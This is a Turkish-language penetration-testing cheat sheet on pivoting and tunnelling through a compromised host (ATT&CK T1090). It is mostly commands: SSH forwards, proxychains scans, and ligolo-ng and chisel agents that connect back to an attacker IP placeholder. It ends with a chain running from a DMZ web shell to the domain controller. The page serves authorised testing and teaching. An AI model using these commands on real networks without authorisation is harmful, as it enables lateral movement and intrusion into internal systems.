Skip to content

Pivoting & Tünelleme

ATT&CK T1090 difficulty: orta

Pivoting, ele geçirilen bir hostu köprü olarak kullanıp normalde erişilemeyen iç ağ segmentlerine ulaşmaktır (T1090). Tünelleme ile tarayıcı, nmap, nxc ve exploit araçlarını bu segmentlere yönlendirirsin.

- Pivot host'ta shell (SSH, WinRM, beacon, web shell)
- Pivot'un ikinci NIC / route ile hedef ağı görmesi
- Saldırgan ↔ pivot arasında çıkış (ters tünel sık gerekir)
Terminal window
ip a; ip route; arp -a
Terminal window
ipconfig /all
Terminal window
route print
Terminal window
ssh -L 8080:10.10.20.5:80 user@pivot
Terminal window
curl http://127.0.0.1:8080/
Terminal window
ssh -L 4450:10.10.20.5:445 -L 3389:10.10.20.8:3389 user@pivot
Terminal window
ssh -R 9001:127.0.0.1:9001 user@pivot
Terminal window
ssh -D 1080 user@pivot
Terminal window
ssh -D 1080 -N -f user@pivot
Terminal window
ssh -J user@pivot user@10.10.20.5
Terminal window
ssh -o ProxyCommand="ssh -W %h:%p user@pivot" user@10.10.20.5

proxychains:

Terminal window
# socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 445,3389 10.10.20.5
Terminal window
proxychains nxc smb 10.10.20.5 -u user -p pass

Windows pivot’ta OpenSSH veya plink:

Terminal window
plink.exe -D 1080 user@attacker
Terminal window
plink.exe -R 1080:127.0.0.1:1080 user@attacker
  1. ligolo-ng — TUN arayüzü; proxychains’siz doğal IP erişimi:

    Terminal window
    sudo ip tuntap add user $USER mode tun ligolo
    Terminal window
    sudo ip link set ligolo up
    Terminal window
    ./proxy -selfcert
    Terminal window
    ./agent -connect SALDIRGAN_IP:11601 -ignore-cert
    Terminal window
    session
    Terminal window
    ifconfig # pivot arayüzlerini gör
    Terminal window
    start
    Terminal window
    sudo ip route add 10.10.20.0/24 dev ligolo
    Terminal window
    nmap -Pn 10.10.20.5 # doğrudan
  2. chisel — HTTP(S) üzerinden reverse SOCKS/port:

    Terminal window
    ./chisel server -p 8000 --reverse
    Terminal window
    ./chisel client SALDIRGAN_IP:8000 R:socks
    Terminal window
    ./chisel client SALDIRGAN_IP:8000 R:445:10.10.20.5:445
  3. Çok katman — pivot1 → pivot2 zinciri; ligolo’da birden fazla session, SSH -J hop, veya chisel’i ikinci hop’ta tekrar çalıştır.

Terminal window
socat TCP-LISTEN:4450,fork TCP:10.10.20.5:445
Terminal window
sshuttle -r user@pivot 10.10.20.0/24
Terminal window
netsh interface portproxy add v4tov4 listenport=8080 \
listenaddress=0.0.0.0 connectport=80 connectaddress=10.10.20.5
Terminal window
nmap -sn 10.10.20.0/24
Terminal window
nxc smb 10.10.20.0/24
Terminal window
nslookup -type=SRV _ldap._tcp.dc._msdcs.hedef.local

SSH Dynamic Proxy

embedded tool
Generated command
ssh -D 1080 -N user@10.10.10.5
DMZ web shell
→ chisel R:socks
→ nxc smb 10.10.20.0/24
→ ligolo TUN + route
→ DC / backup VLAN erişimi